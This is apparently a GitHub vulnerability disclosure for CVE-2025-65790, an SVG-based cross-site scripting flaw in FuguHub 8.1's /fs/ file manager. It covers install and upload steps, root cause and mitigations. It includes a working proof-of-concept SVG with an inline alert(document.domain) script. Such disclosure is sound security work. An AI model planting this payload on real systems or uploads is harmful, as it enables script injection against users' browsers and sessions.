## CVE-2025-65790 - FuguHub 8.1 Reflected SVG XSS 

### Reflected Cross-Site Scripting (XSS) via SVG Rendering in FuguHub

https://www.cve.org/CVERecord?id=CVE-2025-65790

This repository documents a **Reflected Cross-Site Scripting (XSS)** vulnerability in **FuguHub 8.1**, where SVG files containing inline JavaScript are executed when viewed through the internal file manager **/fs/** interface.

**CVE Assigned:** **CVE-2025-65790**  
**Discovered by:** **Han Tek Foo**  
**Severity:** High  
**Impact:** Arbitrary JavaScript Execution

## Introduction
FuguHub is a cloud-based media server developed by Real Time Logic / Sesamt Data AB. During testing of a default installation, a reflected cross-site scripting (XSS) vulnerability was identified in the handling of SVG files served through FuguHub’s built-in file manager.
Malicious JavaScript embedded inside an SVG file is executed automatically when the file is opened via the /fs/ interface. This allows remote attackers to execute arbitrary JavaScript in the victim’s browser.

## Tested Environment
Operating System: Debian Linux (fresh installation)

FuguHub Version: Latest download as of 2025-11-12

URL tested:

 http://127.0.0.1/fs/

FuguHub does not display an explicit version number in the UI. Testing was performed on a clean installation directly from the official download page.

## Proof of Concept

First, download and run the latest version of FuguHub:


`wget https://fuguhub.com/install/FuguHub.linux.install`

`chmod +x FuguHub.linux.install`

`sudo ./FuguHub.linux.install`


1. Go to Web-File-Server section and go to Web File Manager:

![alt text](https://github.com/hunterxxx/FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790/blob/main/Image_Evidences/img1.png)

2. In Web File Manager, upload xss.svg:

![alt text](https://github.com/hunterxxx/FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790/blob/main/Image_Evidences/img2.png)

3. Successfully uploaded xss.svg

![alt text](https://github.com/hunterxxx/FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790/blob/main/Image_Evidences/img3.png)

4. Upon clicking xss.svg, the browser triggers XSS and the alert is showing the domain “127.0.0.1” via alert(document.domain), confirming reflected XSS.

![alt text](https://github.com/hunterxxx/FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790/blob/main/Image_Evidences/image.png)

**Below is the xss.svg code I used in the PoC:**

```
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
   <script type="text/javascript">  
      alert(document.domain);
   </script>
</svg>
```


## 🧩 Root Cause

FuguHub serves SVG files directly without sanitization or script filtering. Browsers treat SVG as active XML content and execute inline `<script>` elements, resulting in reflected XSS.

## 🛡 Impact

Attacker-controlled JavaScript execution may lead to:

- Credential/session hijacking (if cookies not HttpOnly)
- UI manipulation, phishing
- Forced user actions within the application
- Cross-user attack surface expansion

## 🛠 Mitigation Recommendations

- Strip `<script>` tags & event attributes from SVG files
- Disable inline script execution or enforce sandboxing
- Apply strong **Content-Security-Policy (CSP)**
- Restrict SVG uploads or convert to raster (PNG)
- Sanitize/SVG parsing before serving via `/fs/`


## 🏷 CVE Information

This issue was assigned **CVE-2025-65790** by MITRE.

To transition CVE status from `RESERVED → PUBLIC`, this repository is submitted to MITRE as a public reference URL.

 
## Credits

**Discovered by:**  
**Han Tek Foo**  

